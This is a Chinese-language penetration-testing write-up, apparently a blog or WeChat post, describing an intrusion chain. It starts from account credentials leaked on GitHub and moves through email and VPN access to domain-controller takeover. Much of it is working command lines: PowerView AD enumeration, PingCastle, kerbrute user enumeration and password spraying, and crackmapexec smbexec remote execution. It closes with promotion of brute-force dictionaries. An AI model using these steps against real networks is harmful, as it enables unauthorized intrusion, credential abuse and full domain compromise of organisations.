前言
目标资产信息搜集的程度,决定渗透过程的复杂程度。
目标主机信息搜集的深度,决定后渗透权限持续把控。
渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。
信息搜集
Github 信息搜集
对于 Github 很多 xdm 都是用来搜索 exp,poc ... ,其实 Github 上很多东西都能够为我们红队人员所利用,比如本篇通过 Github 泄露账号信息,拨入内网拿到域控。
首先通过 Github 搜索目标资产找到了目标的资产下的账号密码:
通过下载到本地,直接用泄露的 user、pass 登陆到目标邮件系统:
此时通过翻阅邮件内的消息找到了 V*N 的账号密码,并成功拨入 V*N:
随后直接进内网:
发现域控判断该域控为 xx 的域控,为子域控!
通过对该子域控进行信息搜集发现了 web 服务:
<a class="FloatLeft Nav" href="http://172.16.172.121:7000/">统一身份认证管理</a><!--xxxxx,passwrod-->
通过域内用户枚举和密码喷洒攻击(Password Spraying)成功登陆:
继续进行内网资产发现
主域控
CN=xxxx-DC-2ND.xxxx.com.cn 172.16.172.81 12-34-56-78-9A-BC xxxx-DC-2nd.xxxx.com.cn [Win 2016 Standard 14393]
CN=xxxx-DC-1ST.xxxx.com.cn 172.16.172.80 12-34-56-78-9A-BC xxxx-DC-1st.xxxx.com.cn [Win 2016 Standard 14393]
子域控
Found 172.16.172.82 IS_LDAP 172.16.172.82 12-34-56-78-9A-BC xxxx-JG-DC-1st.aaaa.xxxx.com.cn [Win 2016 Standard 14393]
Found 172.16.172.81 IS_LDAP
Found 172.16.172.83 IS_LDAP 172.16.172.83 12-34-56-78-9A-BC xxxx-JG-DC-2nd.aaaa.xxxx.com.cn [Win 2016 Standard 14393]
直接通过凭证连接:
连接到总部:
通过ldap导出机器,用户,域管,dc
Powerview 导出:
Get-NetDomainTrust -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred
Get-NetGroup -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name > group.txt
Get-NetComputer -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name
Get-NetUser -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name
PingCastle.exe --server 172.16.172.80 --user xxxx\ADadmin --password xxxx --protocol ADWSThenLDAP --healthcheck --explore-trust --explore-forest-trust
针对域内用户,进行密码喷洒,尝试看看有没有相同的,通过域内用户枚举和密码喷洒攻击(Password Spraying) 发现有问题,暂时不用!
接下来的思路通过域外枚举域内:
kerbrute_windows_amd64.exe userenum --dc 172.16.172.80 -d xxxx.com.cn user.txt
kerbrute_windows_amd64.exe passwordspray --dc 172.16.172.80 -d xxxx.com.cn user.txt xxxx
拿到域管后:
crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 172.16.172.0/24
crackmapexec.exe -d rootkit -u administrator -p admin!@#45 -t 1 192.168.3.144 --execm smbexec -x "whoami /user"
crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 ip.txt --execm smbexec -x "whoami /user"
进入内网,上线直接横向域控,导出 ntds ... ... 至此域已经拿下,本次渗透结束!
关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,“1120”安全参考等安全杂志PDF电子版,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,还在等什么?赶紧点击下方名片关注学习吧!
推 荐 阅 读